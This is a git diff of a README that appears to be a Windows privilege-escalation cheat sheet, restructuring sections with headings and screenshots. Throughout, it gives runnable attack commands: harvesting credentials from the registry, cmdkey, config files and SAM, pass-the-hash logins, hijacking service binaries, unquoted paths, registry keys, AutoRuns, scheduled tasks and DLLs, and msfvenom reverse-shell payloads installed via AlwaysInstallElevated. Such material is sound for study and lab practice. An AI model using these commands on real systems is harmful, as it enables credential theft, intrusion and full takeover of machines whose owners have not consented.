Update README.md
209
README.md
209
README.md
@@ -1103,6 +1103,10 @@ service_exec(conn, r'cmd /c netsh advfirewall set allprofiles state off')
|
||||
|
||||
#### Credential Access
|
||||
|
||||
#### Credentials from Registry
|
||||
|
||||

|
||||
|
||||
```ps1
|
||||
#######################################################################
|
||||
##### 1. Credentials from registry ####################################
|
||||
@@ -1120,7 +1124,13 @@ reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
|
||||
|
||||
# On Kali, we can use the winexe command to spawn a shell using these credentials
|
||||
winexe -U '{USER}%{PASS}' //{RHOST} cmd.exe
|
||||
```
|
||||
#### Credentials from Saved Creds (cmdkey)
|
||||
|
||||

|
||||

|
||||
|
||||
```ps1
|
||||
|
||||
#########################################################################
|
||||
#### 2. Credentials from cmdkey #########################################
|
||||
@@ -1137,7 +1147,9 @@ C:\PrivEsc\savecred.bat
|
||||
|
||||
# We can use the saved credential to run any command as the admin user
|
||||
runas /savecred /user:{admin} {C:\PrivEsc\reverse.exe}
|
||||
```
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 3. Credentials from configuration files ############################
|
||||
#########################################################################
|
||||
@@ -1150,7 +1162,13 @@ dir /s *pass* == *.config
|
||||
|
||||
# Recursively search for files in the current directory that contain the word “password” and also end in either .xml, .ini, or .txt
|
||||
findstr /si password *.xml *.ini *.txt
|
||||
```
|
||||
|
||||
#### SAM Creds
|
||||
|
||||

|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 4. Credentials from SAM ############################################
|
||||
#########################################################################
|
||||
@@ -1179,6 +1197,8 @@ pth-winexe --system -U 'admin%aad3b435b51404eeaad3b435b51404ee:a9fdfa038c4b75ebc
|
||||
|
||||
#### Exploits
|
||||
|
||||

|
||||
|
||||
<br />
|
||||
|
||||
[Windows Expoit Suggestor](https://github.com/AonCyberLabs/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py)
|
||||
@@ -1201,9 +1221,13 @@ python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | less
|
||||
|
||||
##### Services
|
||||
|
||||
##### Insecure Service Permissions
|
||||
|
||||

|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 1. Insecure Service Properties #####################################
|
||||
#### Insecure Service Permissions #####################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration
|
||||
@@ -1223,9 +1247,15 @@ config {SERVICE} binpath= "\"C:\{PAYLOAD PATH}\""
|
||||
|
||||
# Start a service:
|
||||
net start {SERVICE}
|
||||
```
|
||||
#### Unquoted Service Path
|
||||
|
||||

|
||||

|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
##### 2. Unquoted Service Path ##########################################
|
||||
##### Unquoted Service Path ##########################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration
|
||||
@@ -1242,9 +1272,16 @@ copy reverse.exe {BINARY PATH: ex. "C:\Program Files\Unquoted Path Service\Commo
|
||||
|
||||
# Start a service:
|
||||
net start {SERVICE}
|
||||
```
|
||||
|
||||
|
||||
#### Weak Registry Permissions
|
||||
|
||||

|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 3. Weak Registry Permissions #######################################
|
||||
#### Weak Registry Permissions #######################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration
|
||||
@@ -1269,10 +1306,16 @@ reg add HKLM\SYSTEM\CurrentControlSet\services\regsvc /v ImagePath /t REG_EXPAND
|
||||
|
||||
# Start the service:
|
||||
net start regsvc
|
||||
```
|
||||
|
||||
#### Insecure Service Executables
|
||||
|
||||

|
||||

|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
##### 4. Insecure Service Executables (File Permissions: Everyone) ######
|
||||
##### Insecure Service Executables ####################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration
|
||||
@@ -1293,9 +1336,90 @@ Rename-Item "C:\Program Files\Microvirt\MEmu\MemuService.exe" "C:\Program Files\
|
||||
# Start the service
|
||||
net start filepermsvc
|
||||
Restart-Computer
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
#### AutoRuns
|
||||
|
||||

|
||||

|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 5. DLL Hijacking ###################################################
|
||||
#### AutoRuns ########################################################
|
||||
#########################################################################
|
||||
|
||||
# Requires computer restart for priv esc.
|
||||
|
||||
# Winpeas Enumeration
|
||||
.\winPEASany.exe quiet applicationsinfo
|
||||
|
||||
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
||||
|
||||
# Use accesschk.exe to verify the permissions on each one
|
||||
.\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
|
||||
|
||||
# Copy our reverse shell executable to overwrite the AutoRun executable:
|
||||
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
|
||||
```
|
||||
|
||||
##### Always Install Elevated
|
||||
|
||||

|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### AlwaysInstallElevated ###########################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration to see if both registry values are set
|
||||
.\winPEASany.exe quiet windowscreds
|
||||
|
||||
# Manual Enumeration
|
||||
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
|
||||
# Create a new reverse shell with msfvenom, this time using the msi format, and save it with the .msi extension
|
||||
msfvenom -p windows/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f msi -o reverse.msi
|
||||
|
||||
# Copy the reverse.msi across to the Windows VM, start a listener on Kali, and run the installer to trigger the exploit
|
||||
msiexec /quiet /qn /i C:\users\public\downloads\reverse.msi
|
||||
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
##### Scheduled Tasks
|
||||
|
||||
#### Scheduled Tasks
|
||||
|
||||

|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### Scheduled Tasks #################################################
|
||||
#########################################################################
|
||||
|
||||
# Unfortunately, there is no easy method for enumerating custom tasks that belong to other users as a low privileged user account. Often we have to rely on other clues, such as finding a script or log file that indicates a scheduled task is being run.
|
||||
|
||||
# List all scheduled tasks your user can see:
|
||||
schtasks /query /fo LIST /v
|
||||
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
||||
|
||||
# Inspect interesting scripts
|
||||
type C:\DevTools\CleanUp.ps1
|
||||
|
||||
# Check Permissions for write access on script
|
||||
C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
|
||||
|
||||
# Use echo to append a call to our reverse shell executable to the end of the script
|
||||
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
|
||||
```
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### DLL Hijacking ###################################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration
|
||||
@@ -1327,81 +1451,6 @@ msfvenom -p windows/x64/shell_reverse_tcp LHOST={IP ADDRESS} LPORT={PORT} -f dll
|
||||
net stop dllsvc
|
||||
net start dllsvc
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
##### AutoRuns
|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 1. AutoRuns ########################################################
|
||||
#########################################################################
|
||||
|
||||
# Requires computer restart for priv esc.
|
||||
|
||||
# Winpeas Enumeration
|
||||
.\winPEASany.exe quiet applicationsinfo
|
||||
|
||||
reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
||||
|
||||
# Use accesschk.exe to verify the permissions on each one
|
||||
.\accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe"
|
||||
|
||||
# Copy our reverse shell executable to overwrite the AutoRun executable:
|
||||
copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\Autorun Program\program.exe"
|
||||
```
|
||||
|
||||
##### Always Install Elevated
|
||||
|
||||

|
||||
|
||||
```ps1
|
||||
#########################################################################
|
||||
#### 2. AlwaysInstallElevated ###########################################
|
||||
#########################################################################
|
||||
|
||||
# Winpeas Enumeration to see if both registry values are set
|
||||
.\winPEASany.exe quiet windowscreds
|
||||
|
||||
# Manual Enumeration
|
||||
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
|
||||
|
||||
# Create a new reverse shell with msfvenom, this time using the msi format, and save it with the .msi extension
|
||||
msfvenom -p windows/x64/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f msi -o reverse.msi
|
||||
|
||||
# Copy the reverse.msi across to the Windows VM, start a listener on Kali, and run the installer to trigger the exploit
|
||||
msiexec /quiet /qn /i C:\users\public\downloads\reverse.msi
|
||||
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
##### Scheduled Tasks
|
||||
|
||||
```ps1
|
||||
|
||||
#########################################################################
|
||||
#### 1. Scheduled Tasks #################################################
|
||||
#########################################################################
|
||||
|
||||
# Unfortunately, there is no easy method for enumerating custom tasks that belong to other users as a low privileged user account. Often we have to rely on other clues, such as finding a script or log file that indicates a scheduled task is being run.
|
||||
|
||||
# List all scheduled tasks your user can see:
|
||||
schtasks /query /fo LIST /v
|
||||
PS> Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
|
||||
|
||||
# Inspect interesting scripts
|
||||
type C:\DevTools\CleanUp.ps1
|
||||
|
||||
# Check Permissions for write access on script
|
||||
C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
|
||||
|
||||
# Use echo to append a call to our reverse shell executable to the end of the script
|
||||
echo C:\PrivEsc\reverse.exe >> C:\DevTools\CleanUp.ps1
|
||||
|
||||
```
|
||||
|
||||
<br />
|
||||
|
||||
|
||||
|
||||